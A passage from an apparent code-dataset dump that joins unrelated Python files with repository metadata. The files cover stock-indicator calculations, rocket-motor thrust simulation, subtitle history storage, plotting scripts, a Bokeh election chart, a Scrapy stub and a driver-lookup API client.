            rs = up/down
            rsi[i] = 100. - 100./(1. + rs)
        return rsi

    def moving_average(self, n, type='simple'):
        """
        compute an n period moving average.
        type is 'simple' | 'exponential'
        """
        prices = [row['adj_close'] for row in self.data]
        if type == 'simple':
            weights = np.ones(n)
        else:
            weights = np.exp(np.linspace(-1., 0., n))
        weights /= weights.sum()
        a = np.convolve(prices, weights, mode='full')[:len(prices)]
        # The first n outputs use incomplete windows; clamp them to a[n].
        a[:n] = a[n]
        return a

    def moving_average_convergence(self, nslow=26, nfast=12):
        """
        compute the MACD (Moving Average Convergence/Divergence) using a fast and slow exponential moving avg'
        return value is emaslow, emafast, macd which are len(x) arrays
        """
        emaslow = self.moving_average(nslow, type='exponential')
        emafast = self.moving_average(nfast, type='exponential')
        return emaslow, emafast, emafast - emaslow

    def _parse(self, data):
        """Parse Yahoo CSV text into ``self.data`` (oldest row first)."""
        self.data = []
        lines = str(data).split('\n')
        # Skip the header row and trailing blank line, then reverse so the
        # oldest quote comes first.
        for line in lines[1:-1][::-1]:
            # FIX: locals renamed — the originals shadowed the imported
            # `date` class and the `open` builtin.
            (day_str, open_px, high, low, close, vol, adj_close) = line.split(',')
            row_date = datetime.strptime(day_str, '%Y-%m-%d').date()
            self.data.append({
                'date': row_date,
                'open': float(open_px),
                'high': float(high),
                'low': float(low),
                'close': float(close),
                'vol': float(vol),
                'adj_close': float(adj_close)
            })
        # FIX: identity comparison with None (`is not None`), not `!= None`.
        if self.data_from is not None:
            self.data = [row for row in self.data if row['date'] >= self.data_from]
        if self.data_to is not None:
            self.data = [row for row in self.data if row['date'] <= self.data_to]
        return self.data
if __name__ == '__main__':
    # get historica csv file from last month
    # Demo: download Hang Seng Index quotes for 2015 and plot price vs. SMAs.
    s = '^HSI'
    dest_file = s + '.csv'
    dest_file = os.path.join(os.path.dirname(__file__), 'data', dest_file)
    t = date(2015, 12, 9)
    f = date(2015, 1, 4)
    h = YahooHistorical(f, t)
    h.download(s)
    # h.open(dest_file)
    y = h.get()
    x = [row['date'] for row in y]
    sma20 = h.moving_average(20, type='simple') # 20 day moving average
    sma200 = h.moving_average(200, type='simple') # 200 day moving average
    rsi = h.relative_strength()  # computed but not plotted below
    plt.rc('axes', grid=True)
    plt.rc('grid', color='0.75', linestyle='-', linewidth=0.5)
    plt.plot(x, [row['adj_close'] for row in y], color='blue', label=s)
    plt.plot(x, sma200[-len(x):], color='red', label='SMA(200)')
    plt.plot(x, sma20[-len(x):], color='green', label='SMA(20)')
    plt.legend()
    plt.show()
|
[
"indiejoseph@gmail.com"
] |
indiejoseph@gmail.com
|
13062f5bb63f7c2e896539dfbf77370ec2204220
|
7b7eedc2144883bb88c8445bc684bb72fcc2e866
|
/motors.py
|
56c771dc148821cb556b63e0056f1ed4965e42e8
|
[] |
no_license
|
ZegesMenden/sim-v2
|
b094ecdebcf29f1be39d5b8715a629f57d41cade
|
c250dbc57f98e57b41c473155e4d4699403b8dd8
|
refs/heads/main
| 2023-08-25T04:36:59.441408
| 2021-09-29T03:00:25
| 2021-09-29T03:00:25
| 410,317,421
| 2
| 0
| null | 2021-09-30T20:13:54
| 2021-09-25T16:04:56
|
Python
|
UTF-8
|
Python
| false
| false
| 8,296
|
py
|
import random
d12_thrust = [
[0.049, 2.569],
[0.116, 9.369],
[0.184, 17.275],
[0.237, 24.258],
[0.282, 29.73],
[0.297, 27.01],
[0.311, 22.589],
[0.322, 17.99],
[0.348, 14.126],
[0.386, 12.099],
[0.442, 10.808],
[0.546, 9.876],
[0.718, 9.306],
[0.879, 9.105],
[1.066, 8.901],
[1.257, 8.698],
[1.436, 8.31],
[1.59, 8.294],
[1.612, 4.613],
[1.65, 0]
]
e6_thrust = [
[0.056, 18.59],
[0.112, 20.12],
[0.168, 17.575],
[0.307, 14.38],
[0.531, 10.45],
[0.894, 7.696],
[1.146, 6.244],
[1.691, 5.808],
[2.836, 5.663],
[3.898, 5.517],
[4.275, 5.227],
[4.415, 4.937],
[5.058, 5.082],
[5.519, 5.227],
[5.603, 6.679],
[5.729, 3.921],
[5.882, 2.323],
[5.966, 1.016],
[6.06, 0]
]
e6_rct_thrust = [
[0,0],
[0.047,10.866],
[0.127,11.693],
[0.19,11.9],
[0.316,11.622],
[0.522,10.593],
[0.743,9.287],
[0.996,7.842],
[1.249,6.19],
[1.47,5.296],
[1.787,4.747],
[2.372,4.471],
[3.02,4.403],
[3.747,4.264],
[4.49,4.403],
[5.375,4.333],
[6.087,4.264],
[6.719,4.264],
[6.877,4.196],
[6.957,3.783],
[7.004,2.614],
[7.036,1.513],
[7.083,0.55],
[7.12,0]
]
e12_thrust = [
[0.052, 5.045],
[0.096, 9.910],
[0.196, 24.144],
[0.251, 31.351],
[0.287, 32.973],
[0.300, 29.910],
[0.344, 17.117],
[0.370, 14.414],
[0.400, 12.973],
[0.500, 11.712],
[0.600, 11.171],
[0.700, 10.631],
[0.800, 10.09],
[0.900, 9.73],
[1.000, 9.55],
[1.101, 9.91],
[1.200, 9.55],
[1.300, 9.73],
[1.400, 9.73],
[1.500, 9.73],
[1.600, 9.73],
[1.700, 9.55],
[1.800, 9.73],
[1.900, 9.73],
[2.000, 9.55],
[2.100, 9.55],
[2.200, 9.73],
[2.300, 9.19],
[2.375, 9.37],
[2.400, 5.95],
[2.440, 0.0]
]
f15_thrust = [
[0.063, 2.127],
[0.118, 4.407],
[0.158, 8.359],
[0.228, 13.68],
[0.340, 20.82],
[0.386, 26.75],
[0.425, 25.38],
[0.481, 22.19],
[0.583, 17.93],
[0.883, 16.11],
[1.191, 14.59],
[1.364, 15.35],
[1.569, 15.65],
[1.727, 14.74],
[2.00, 14.28],
[2.39, 13.68],
[2.68, 13.08],
[2.96, 13.07],
[3.25, 13.05],
[3.35, 13.0],
[3.39, 7.30],
[3.40, 0.00]
]
f10_thrust = [
[0.015, 28.22],
[0.077, 26.082],
[0.201, 24.934],
[0.31 ,22.806],
[0.464, 20.183],
[0.573, 17.886],
[0.789, 16.075],
[1.068, 13.946],
[1.393, 12.63],
[1.718, 11.155],
[2.166, 9.844],
[2.677, 9.515],
[3.311, 9.187],
[3.683, 8.859],
[3.791, 9.679],
[4.101, 9.679],
[4.658, 9.515],
[5.168, 9.023],
[5.725, 9.023],
[6.112, 8.531],
[6.329, 8.859],
[6.499, 7.546],
[6.685, 5.742],
[6.778, 4.921],
[6.917, 2.625],
[7.025, 1.312],
[7.13, 0]
]
g12_RCT_thrust = [
[0.03, 18.549],
[0.117, 19.96],
[0.239, 20.64],
[0.362, 20.111],
[0.519, 18.982],
[0.694, 17.138],
[0.886, 15.02],
[1.131, 13.186],
[1.375, 11.915],
[1.689, 11.069],
[2.021, 10.363],
[2.422, 10.232],
[3.172, 9.677],
[4.114, 9.267],
[5.039, 8.857],
[6.137, 8.733],
[7.132, 8.607],
[7.795, 8.335],
[7.952, 8.196],
[8.074, 8.055],
[8.179, 6.924],
[8.319, 4.661],
[8.476, 1.973],
[8.55, 0]
]
g12st_thrust = [
[0.042, 33.827],
[0.104, 30.173],
[0.23, 28.009],
[0.543, 22.326],
[0.836, 16.102],
[1.024, 12.448],
[1.379, 10.96],
[2.006, 10.148],
[4.054, 9.742],
[6.269, 10.148],
[6.415, 10.148],
[6.582, 10.148],
[11.973, 9.742],
[12.475, 9.742],
[12.663, 9.607],
[12.83, 9.066],
[12.913, 7.713],
[12.934, 5.412],
[13.018, 2.03],
[13.06, 0.0]
]
g11_thrust = [
[0.084, 30.444],
[0.105, 28.414],
[0.209, 27.738],
[0.419, 24.085],
[0.753, 18.402],
[0.9, 14.748],
[1.046, 11.907],
[1.444, 10.013],
[2.051, 9.742],
[3.034, 9.201],
[4.018, 9.471],
[5.483, 9.201],
[5.713, 8.93],
[9.375, 9.742],
[9.501, 8.93],
[11.049, 9.742],
[12.263, 9.336],
[13.288, 8.66],
[13.456, 7.307],
[13.602, 4.6],
[13.77, 1.624],
[13.937, 0.0]
]
g8st_thrust = [
[0.038, 5.121],
[0.039, 8.069],
[0.188, 9.828],
[0.414, 10.397],
[0.715, 10.19],
[1.354, 9.517],
[2.069, 9.155],
[3.424, 8.793],
[4.552, 8.431],
[6.057, 8.276],
[6.81, 8.069],
[7.713, 8.121],
[9.03, 8.017],
[9.97, 7.966],
[10.76, 7.914],
[14.222, 7.397],
[14.335, 7.19],
[15.764, 7.138],
[16.404, 6.983],
[16.554, 7.5],
[16.63 ,6.724],
[16.818, 5.69],
[16.968, 3.414],
[17.119, 1.655],
[17.269, 0.0]
]
h13st_thrust = [
[0.005, 0.107],
[0.024, 2.636],
[0.035, 18.978],
[0.081, 32.724],
[0.147, 36.421],
[0.379, 44.529],
[0.452, 23.851],
[0.566, 18.890],
[0.818, 16.728],
[1.286, 15.676],
[2.114, 14.753],
[3.230, 14.032],
[4.382, 13.926],
[5.786, 13.469],
[7.082, 13.119],
[8.666, 12.916],
[10.286, 12.820],
[12.086, 12.612],
[13.598, 12.333],
[14.750, 11.908],
[15.230, 11.078],
[15.302, 6.048],
[15.432, 0]
]
#making a better thrust curve by averaging the thrust curve data
def interpolateThrust(thrust_curve, timeStep):
    """Linearly interpolate a sparse thrust curve onto a fixed-rate grid.

    thrust_curve: list of [time, thrust] sample points (time ascending).
    timeStep: simulation rate in steps per unit time.
    Returns a flat list with one interpolated thrust value per step.
    """
    samples = []
    prev_time, prev_thrust = 0, 0
    for time_pt, thrust_pt in thrust_curve:
        # Points at t <= 0 carry no segment to interpolate over.
        if time_pt > 0:
            span_steps = (time_pt - prev_time) * timeStep
            if span_steps > 0:
                slope = (thrust_pt - prev_thrust) / span_steps
                value = prev_thrust
                step = 0
                # Walk the segment one step at a time, accumulating the slope
                # (fractional spans round the step count up).
                while step < span_steps:
                    step += 1
                    value += slope
                    samples.append(value)
        prev_time, prev_thrust = time_pt, thrust_pt
    return samples
class motorType(enumerate):
    # Namespace of the supported Estes/AeroTech-style motor thrust curves.
    # NOTE(review): subclassing `enumerate` is almost certainly unintended —
    # the class is only ever used as a bag of attributes, so `object` (or an
    # enum.Enum) would be the conventional base. It works because the class
    # is never instantiated.
    d12 = d12_thrust
    e6 = e6_thrust
    e6_rct = e6_rct_thrust
    e12 = e12_thrust
    f15 = f15_thrust
    f10 = f10_thrust
    g12_rct = g12_RCT_thrust
    g12_st = g12st_thrust
    g11 = g11_thrust
    g8_st = g8st_thrust
    h13 = h13st_thrust
class rocketMotor:
    """Tracks one or more named motors for a fixed-rate simulation: ignition
    scheduling, per-step thrust lookup, and propellant/casing mass bookkeeping.
    """

    def __init__(self, timeStep):
        # timeStep is the simulation rate in steps per second — TODO confirm.
        self.motorNames = []
        self.thrustLists = {}  # name -> interpolated per-step thrust samples
        self.currentThrust = 0.0
        self.ignitionTimes = {}  # name -> ignition instant, in step units
        self.ignitionDelays = {}  # name -> randomized igniter delay
        self.timeStep = timeStep
        self.maxIgnitionDelay = 0.0
        self.totalMotorMass = 0.0  # combined mass of all loaded motors (kg, presumably)
        self.lastTime = 0.0
        self.isLit = {}
        self.isEjected = {}

    def add_motor(self, motor, motorName):
        # Each motor adds a fixed 0.04 mass; delay is 90-100% of maxIgnitionDelay.
        self.totalMotorMass += 0.04
        self.motorNames.append(str(motorName))
        self.thrustLists[str(motorName)] = interpolateThrust(motor, self.timeStep)
        self.ignitionDelays[str(motorName)] = random.randint(90, 100) / 100 * self.maxIgnitionDelay
        self.ignitionTimes[str(motorName)] = 0.0
        self.isLit[str(motorName)] = False
        self.isEjected[str(motorName)] = False

    def ignite(self, motor, time):
        # The "ascent" motor lights instantly; others get the igniter delay.
        if self.isLit[str(motor)] == False:
            if motor == "ascent":
                self.ignitionTimes[str(motor)] = time * self.timeStep
            else:
                self.ignitionTimes[str(motor)] = (time + self.ignitionDelays[str(motor)]) * self.timeStep
            self.isLit[str(motor)] = True

    def update(self, time):
        # Advance all lit motors to `time` (seconds): look up the thrust
        # sample for the current step and burn off propellant mass.
        dt = time - self.lastTime
        for motor in self.motorNames:
            if self.isLit[motor] == True:
                counter = int((time * self.timeStep) - self.ignitionTimes[motor])
                if counter > 0 and counter < len(self.thrustLists[motor]):
                    self.currentThrust = self.thrustLists[motor][counter]
                    self.totalMotorMass -= 0.008 * dt  # propellant burn rate
                elif counter > len(self.thrustLists[motor]):
                    self.currentThrust = 0.0
                    # Burnout: one-time ejection-charge mass loss.
                    if self.isEjected[motor] == False:
                        self.totalMotorMass -= 0.02
                        self.isEjected[motor] = True
        self.lastTime = time
|
[
"camkullberg@gmail.com"
] |
camkullberg@gmail.com
|
535ab1f03fa288dffff618b0626cc5aadff6aeb8
|
8a820aa0d3b0d69d8073780e2bf1db7b6bfdd9ef
|
/Contents/Libraries/Shared/subzero/history_storage.py
|
4a20e8b2a72df7694d5e013371705d5ea971e1c2
|
[
"MIT"
] |
permissive
|
doopler/Sub-Zero.bundle
|
27c3fb6e7e953381a2a19fec81a88efe4f1e0e70
|
82550a7341fcd40ef97af4b1ba0f3ed2b5063121
|
refs/heads/master
| 2020-03-26T08:40:56.903484
| 2018-08-14T12:17:59
| 2018-08-14T12:17:59
| 144,715,110
| 1
| 0
| null | 2018-08-14T12:09:26
| 2018-08-14T12:09:25
| null |
UTF-8
|
Python
| false
| false
| 3,373
|
py
|
# coding=utf-8
import datetime
import logging
import traceback
import types
from subzero.language import Language
from constants import mode_map
logger = logging.getLogger(__name__)
class SubtitleHistoryItem(object):
    """One history record: which subtitle was stored for which media item.

    Python 2 code — `unicode` and the str/unicode mixing below are intentional.
    """
    # Class-level defaults; each is overwritten per instance in __init__.
    item_title = None
    section_title = None
    rating_key = None
    provider_name = None
    lang_name = None
    lang_data = None
    score = None
    time = None
    mode = "a"
    def __init__(self, item_title, rating_key, section_title=None, subtitle=None, mode="a", time=None):
        self.item_title = item_title
        self.section_title = section_title
        self.rating_key = str(rating_key)
        self.provider_name = subtitle.provider_name
        self.lang_name = str(subtitle.language.name)
        # Language is flattened to plain strings so the record serializes safely.
        self.lang_data = str(subtitle.language.alpha3), \
                         str(subtitle.language.country) if subtitle.language.country else None, \
                         str(subtitle.language.script) if subtitle.language.script else None
        self.score = subtitle.score
        self.time = time or datetime.datetime.now()
        self.mode = mode
    @property
    def title(self):
        """Display title: '<section>: <item>'."""
        return u"%s: %s" % (self.section_title, self.item_title)
    @property
    def language(self):
        # Rebuild a Language object from the stored strings; literal "None"
        # strings (from older stored records) normalize back to None.
        if self.lang_data:
            lang_data = [s if s != "None" else None for s in self.lang_data]
            if lang_data[0]:
                return Language(lang_data[0], country=lang_data[1], script=lang_data[2])
    @property
    def mode_verbose(self):
        """Human-readable download mode (falls back to 'Unknown')."""
        return mode_map.get(self.mode, "Unknown")
    def __repr__(self):
        return unicode(self)
    def __unicode__(self):
        return u"%s (Score: %s)" % (unicode(self.item_title), self.score)
    def __str__(self):
        return str(self.rating_key)
    def __hash__(self):
        # Identity for equality/hash purposes is (rating_key, score) only.
        return hash((self.rating_key, self.score))
    def __eq__(self, other):
        return (self.rating_key, self.score) == (other.rating_key, other.score)
    def __ne__(self, other):
        # Not strictly necessary, but to avoid having both x==y and x!=y
        # True at the same time
        return not (self == other)
class SubtitleHistory(object):
    """Bounded, persisted list of SubtitleHistoryItem records, newest first."""
    size = 100
    storage = None
    threadkit = None
    def __init__(self, storage, threadkit, size=100):
        self.size = size
        self.storage = storage
        self.threadkit = threadkit
    def add(self, item_title, rating_key, section_title=None, subtitle=None, mode="a", time=None):
        """Prepend a new record and persist; a named lock serializes concurrent adds."""
        with self.threadkit.Lock(key="sub_history_add"):
            items = self.items
            item = SubtitleHistoryItem(item_title, rating_key, section_title=section_title, subtitle=subtitle, mode=mode, time=time)
            # insert item
            items.insert(0, item)
            # clamp item amount
            items = items[:self.size]
            # store items
            self.storage.SaveObject("subtitle_history", items)
    @property
    def items(self):
        """Load stored history; always returns a fresh list, never the stored object."""
        try:
            items = self.storage.LoadObject("subtitle_history") or []
        except:
            # Corrupt/unreadable storage degrades to an empty history rather
            # than failing the caller; the error is logged for diagnosis.
            items = []
            logger.error("Failed to load history storage: %s" % traceback.format_exc())
        if not isinstance(items, types.ListType):
            items = []
        else:
            items = items[:]
        return items
    def destroy(self):
        # Drop references so the plugin can be shut down / reloaded cleanly.
        self.storage = None
        self.threadkit = None
|
[
"panni@fragstore.net"
] |
panni@fragstore.net
|
780173b271325b9397af4297e081e6d0729e5fa6
|
0951232bebefae4f22fb3692faedf3fbace12924
|
/Lambda.py
|
b1b8dc85df0a8e0441b4c0b9de6828b83bba40d8
|
[] |
no_license
|
AshishXD/PyPrograms
|
340ad65edb608113552656b7492b30109f69905e
|
f7f58a438466ff4b95aa54dfd7a752627e6441bd
|
refs/heads/master
| 2020-05-17T16:47:31.680867
| 2019-05-02T00:14:18
| 2019-05-02T00:14:18
| 183,571,138
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 51
|
py
|
# PEP 8 (E731): use `def` instead of binding a lambda to a name, so the
# function gets a proper __name__ for tracebacks and introspection.
def f(a, b):
    """Return the product of *a* and *b*."""
    return a * b

result = f(5, 6)
print(result)
|
[
"28337472+AshishXD@users.noreply.github.com"
] |
28337472+AshishXD@users.noreply.github.com
|
a1425ba1a47bf48e828aaf70912eeb18a857a0d7
|
3ccc4d7e778e1505a861233454400322a537772e
|
/python-1/loops/iterables.py
|
4056446e25bf4627dd7360b7fd8ca0b4d3634864
|
[] |
no_license
|
abubakr2234/Python-1
|
90687231a96050980fb51fb1520bce73786db232
|
6e065f1dfec2be79394b9d04322569d7daa25918
|
refs/heads/main
| 2023-01-20T21:57:36.763085
| 2020-11-30T07:52:32
| 2020-11-30T07:52:32
| 317,148,296
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 45
|
py
|
# Print each entry of the shopping cart on its own line.
# NOTE(review): `shopping_cart` is never defined in this file — as written
# this raises NameError; it must be assigned before the loop runs.
for item in shopping_cart:
    print(item)
|
[
"noreply@github.com"
] |
abubakr2234.noreply@github.com
|
c7268b076f3a3fcd57055a0189fabb5f00b8addb
|
39a624acb3598e311e3eeec674c883c013a14db7
|
/src/vis_rq2.1.py
|
237c1703a62c64f027978b98c0e97fd194c9bd91
|
[] |
no_license
|
prasri92/MaxEnt
|
69c9f5456c0fbd8feb3a702b76e5f0df0f7e8c0c
|
9c37c1d12ac6a475a763b3655dd9af1f201c2728
|
refs/heads/master
| 2020-05-04T19:20:24.066256
| 2020-04-14T15:34:15
| 2020-04-14T15:34:15
| 179,388,469
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,682
|
py
|
'''
Python = 3.7
matplotlib to plot figures
'''
#PYTHON3
import numpy as np
import pickle
import matplotlib.pyplot as plt
import csv
import pandas as pd
import sys
from scipy.stats import power_divergence
from scipy.spatial import distance
# Promote all numpy floating-point warnings (divide-by-zero etc.) to
# exceptions so the divergence computations below fail loudly.
np.seterr(all='raise')
# Perturbation probabilities swept along the x-axis of the robustness plots.
perturb_prob = [0.01, 0.03, 0.06, 0.09, 0.12, 0.15, 0.18, 0.21]
# perturb_prob = [0.01, 0.03, 0.06, 0.09, 0.12, 0.15]
# Read the true prob. distribution for sum of diseases
def read_up_prob(filename):
    """Load the pickled (unregularized, regularized) probability pair at *filename*."""
    with open(filename, "rb") as handle:
        loaded = pickle.load(handle, encoding='latin1')
    return loaded[0], loaded[1]
def read_p_prob(filename):
    """Load the pickled (unregularized, regularized) perturbed probability pair."""
    infile = open(filename, "rb")
    try:
        # latin1 lets Python 3 read pickles written by Python 2.
        pair = pickle.load(infile, encoding='latin1')
    finally:
        infile.close()
    return pair[0], pair[1]
# Get kl divergence of probability distributions
def kl_divergence(p, q):
    """Return sum_i p_i * log(p_i / q_i) — KL divergence in nats; p, q are numpy arrays."""
    return np.sum(p * np.log(p / q))
def calc_kl(k, i=3):
    """Compute divergence between unperturbed and perturbed MaxEnt
    distributions for *k* diseases, at every perturbation level.

    k: number of diseases (selects the output directory).
    i: experiment index embedded in the pickle file names.
    Returns (kl_ur_p, kl_r_p): one divergence per perturbation level for
    the unregularized and regularized models respectively.
    """
    kl_ur_p = []
    kl_r_p = []
    maxent_ur_up, maxent_r_up = read_up_prob('../output/d'+str(k)+'_expt2.1_w1_ls/syn_maxent_up'+str(i)+'.pickle')
    for p in perturb_prob:
        maxent_file = '../output/d'+str(k)+'_expt2.1_w1_ls/syn_maxent_p'+str(i)+'_'+str(p)+'.pickle'
        maxent_ur_p, maxent_r_p = read_p_prob(maxent_file)
        # NOTE(review): the loop variable `p` is rebound here from a scalar
        # probability to an array — confusing but harmless, since `p` was
        # already consumed building the file name above.
        p = np.array(maxent_ur_up)
        q = np.array(maxent_ur_p)
        r = np.array(maxent_r_up)
        s = np.array(maxent_r_p)
        try:
            kl_1, p_val_1 = power_divergence(f_obs=q, f_exp=p, lambda_="cressie-read")
            kl_2, p_val_2 = power_divergence(f_obs=s, f_exp=r, lambda_="cressie-read")
            # kl_1 = distance.jensenshannon(p, q)
            # kl_2 = distance.jensenshannon(r, s)
            # kl_1 = kl_divergence(p, q)
            # kl_2 = kl_divergence(r, s)
        except:
            # np.seterr(all='raise') turns zero expected frequencies into
            # exceptions; replace exact zeros with a tiny value and retry.
            # NOTE(review): bare except also hides unrelated failures.
            p[p == 0] = 1e-300
            r[r == 0] = 1e-300
            kl_1, p_val_1 = power_divergence(f_obs=q, f_exp=p, lambda_="cressie-read")
            kl_2, p_val_2 = power_divergence(f_obs=s, f_exp=r, lambda_="cressie-read")
        # print('P:', p)
        # print('Q:', q)
        # print('R:', r)
        # print('S:', s)
        kl_ur_p.append(kl_1)
        kl_r_p.append(kl_2)
    return kl_ur_p, kl_r_p
def plot(k):
    """Plot divergence vs. perturbation probability for *k* diseases and
    save the figure under ../figures/Experiments/."""
    # x_ticks = np.arange(0, 0.23, 0.02)
    # y_ticks = np.arange(0, 3, 0.5)
    plt.style.use('seaborn-darkgrid')
    kl_ur_p, kl_r_p = calc_kl(k=k)
    plt.plot(perturb_prob, kl_ur_p, marker='o', label='Unregularized')
    plt.plot(perturb_prob, kl_r_p, marker='d', label='Regularized')
    # plt.xticks(x_ticks)
    # plt.yticks(y_ticks)
    plt.legend(fontsize=9)
    plt.title('Regularization for different Perturbations: '+str(k)+' diseases (Learned Support)\n'+'Single Width W = 1')
    plt.xlabel('Perturbed Probability')
    plt.ylabel(r'Power Divergence ($\lambda$ = 2/3)')
    # plt.ylabel('Jensen-Shannon Divergence')
    plt.savefig('../figures/Experiments/pert_d'+str(k)+'_robust_ls.png')
    plt.show()
# Entry point: the single CLI argument is the number of diseases to plot.
num_dis = sys.argv[1]
plot(int(num_dis))
|
[
"pboddavarama@umass.edu"
] |
pboddavarama@umass.edu
|
e13de2855dbb68e6195e0ee8c48fadd3b73e75f5
|
136ba112f67b7459891d50fb8eb33e5aca99b8ef
|
/cv4/cv4/cv4.py
|
7c762a58ee55d1c6fbd2fd094baeef2ad9e31e7b
|
[] |
no_license
|
hruskaz/python
|
1bdf940fb890742e4ad03b5e3e2a953aa7d68401
|
98605087aceffa3120d8f9b55d534715241a114a
|
refs/heads/master
| 2021-05-09T10:38:28.314177
| 2018-01-25T21:02:53
| 2018-01-25T21:02:53
| 118,968,401
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,209
|
py
|
import json
from bokeh.models import ColumnDataSource, DataRange1d, Plot, LinearAxis, Grid
from bokeh.models.glyphs import Wedge
from bokeh.plotting import figure, show
from numpy import pi
import numpy
from bokeh.io import curdoc, show
parties = []
# NOTE(review): this rebinding shadows the imported `json` module with the
# parsed list — works only because the module is never used again; rename
# the variable if the module is needed later.
json = json.loads(open('election.json', encoding='utf-8').read())
# Bucket for parties polling under 1%, aggregated into a single 'Other' slice.
lowParties = {'name': 'Other',
              'share': 0,
              'number': 0,
              'votes': 0,
              'color': '#d1f442',
              'short': 'Other'}
parties.append(lowParties)
for item in json:
    party = {}
    if item['share'] < 1:
        # Fold sub-1% parties into the 'Other' entry at index 0.
        parties[0]['share'] += item['share']
        parties[0]['votes'] += item['votes']
    else:
        party['name'] = item['name']
        party['share'] = item['share']
        party['number'] = item['number']
        party['votes'] = item['votes']
        # Fall back to a default color / the full name when optional
        # keys are missing from the input record.
        if 'color' in item.keys():
            party['color'] = item['color']
        else:
            party['color'] = "#b3de69"
        if 'short' in item.keys():
            party['short'] = item['short']
        else:
            party['short'] = item['name']
        parties.append(party)
party = dict()
# Column source for the bar chart: one column per party attribute.
datasource = ColumnDataSource(dict(
    names=[party['name'] for party in parties],
    shares=[party['share'] for party in parties],
    numbers=[party['number'] for party in parties],
    votes=[party['votes'] for party in parties],
    colors=[party['color'] for party in parties],
    shorts=[party['short'] for party in parties],
    length=range(len(parties)),
    width=[0.7 for x in range(len(parties))]
))
begins = []
ends = []
# Each party's share (percent) converted to a wedge angle in radians.
wbr = [float("{0:.2f}".format((party['share']*3.6)*pi/180)) for party in parties]
cursor = 0
for i in range(0, len(wbr)):
    begins.append(cursor + wbr[i])
    cursor += wbr[i]
for item in begins:
    if begins.index(item) == 0:
        continue;
    else:
        ends.append(item)
ends.append(begins[0])
# NOTE(review): `begins[0]` is wbr[0] rather than 0, so wedge i spans the
# cumulative interval of party i+1 while carrying party i's color/label —
# the pie slices appear shifted by one. Verify against the rendered chart.
wgs = ColumnDataSource(data={
    'starts': begins,
    'ends': ends,
    'color': [party['color'] for party in parties],
    'label': [party['short'] for party in parties]
})
chart = figure()
chart.vbar(x='length', top='votes', width='width', fill_color='colors', legend='shorts', source=datasource)
show(chart)
chart = figure()
chart.wedge(x=0, y=0, radius=1, start_angle='starts', end_angle='ends', color='color', legend='label', source=wgs)
show(chart)
|
[
"35738612+hruskaz@users.noreply.github.com"
] |
35738612+hruskaz@users.noreply.github.com
|
89179fd9b5645eb46626433f7b906e7327866d51
|
fb124f5ebf77612763cba74b4cc74a8b0c6ad529
|
/mir/mir/pipelines.py
|
ed6286dbd0c641f260c9d58c395752612e6c1a9a
|
[] |
no_license
|
mhbahmani/Microsoft-Academic-Crawling
|
e3b5a55bf387aa7fd89328a4dd7ce482ec3246a9
|
eadbe5c13969f6b2d620472edeee8be73360d66e
|
refs/heads/master
| 2023-06-15T04:35:02.578425
| 2021-07-12T11:34:09
| 2021-07-12T11:34:09
| 376,807,752
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 357
|
py
|
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
# useful for handling different item types with a single interface
from itemadapter import ItemAdapter
class MirPipeline:
    """Default scrapy item pipeline for the mir crawler: passes items through."""
    def process_item(self, item, spider):
        # No transformation yet; returning the item keeps it flowing to any
        # later pipelines configured in ITEM_PIPELINES.
        return item
|
[
"mhbahmani79@gmail.com"
] |
mhbahmani79@gmail.com
|
75cd87ee0375251effc90d2312b9755e3c5f3ff0
|
546168fc714d5de62c78eb49fa05a6c079c5dcca
|
/main.py
|
370da353ffb92d5ccdf10358af94b23d6621faba
|
[] |
no_license
|
Introduction-to-Programming-OSOWSKI/2-8-hasl-BrandonFreeman24
|
7b360b0c7452b309e9fe3296eb5cfd2aa6397ad1
|
6c77d77b0fb0759f90e32e7435a08e6d85064eeb
|
refs/heads/master
| 2023-08-15T02:48:35.564465
| 2021-10-06T19:40:08
| 2021-10-06T19:40:08
| 413,567,888
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 136
|
py
|
def hasL(w):
    """Return True if the string *w* contains a lowercase 'l'."""
    # `in` does the same linear scan as the original index loop, but
    # idiomatically and at C speed.
    return "l" in w
print(hasL("sup"))
|
[
"818119@mystma.org"
] |
818119@mystma.org
|
5ced23b07ed976ff1e9dcab53779bde7a769629e
|
dc234aa3d956a43ef3c269a80e15ee79350d05fd
|
/interface/driver/driver_get.py
|
a1aca852bce7a5cf36d8b3f8cd3fc852094aa6f5
|
[] |
no_license
|
penny1205/UI_testing_compare
|
06eee20ebde751a9907c48608143ce09f52bdadd
|
09e3fd4d2d8f41599118ea3262b68d43a0159fac
|
refs/heads/master
| 2020-06-18T15:00:53.664013
| 2018-02-01T06:58:33
| 2018-02-01T06:58:33
| 196,339,736
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,294
|
py
|
#__author__ = 'pan'
# -*- coding:utf-8 -*-
from util.http.httpclient import HttpClient
from util.config.yaml.readyaml import ReadYaml
from util.file.fileutil import FileUtil
from util.log.log import Log
class DriverGet(object):
    '''
    Look up driver details by the loginId of an externally hired vehicle's owner.
    Endpoint: /api/tms/driver/getTmsAppDriverDetail
    '''
    # Restrict instances to exactly these two (name-mangled) attributes.
    __slots__ = ('__driverGetApiUrl', '__head_dict')
    def __init__(self):
        # Endpoint URL and auth headers are assembled from the project YAML config.
        config = ReadYaml(FileUtil.getProjectObsPath() + '/config/config.yaml').getValue()
        self.__driverGetApiUrl = "https://{0}:{1}{2}/api/tms/driver/getTmsAppDriverDetail".format(
            config['tms_api_host'],config['tms_api_port'],config['tms_api_path'])
        self.__head_dict = {
            'token': config['tms_api_token'],
            'YD_OAUTH': config['tms_api_YD_OAUTH'],
        }
    def driver_get(self,loginId=''):
        '''Query driver details by the owner's loginId; returns the HTTP response, or None on error.'''
        try:
            payload = {
                'loginId': loginId
            }
            response = HttpClient().get(self.__driverGetApiUrl,self.__head_dict,payload)
            return response
        except Exception as e:
            # Log message kept verbatim (Chinese): "exception while querying
            # driver info by external-vehicle owner loginId".
            Log().error('根据外请车车主loginId查司机信息发生异常:{0}'.format(e))
            return None
|
[
"panyuanyuan@keking.cn"
] |
panyuanyuan@keking.cn
|
69dd8b29c317d19d14daa7afd3d77d7da537cda0
|
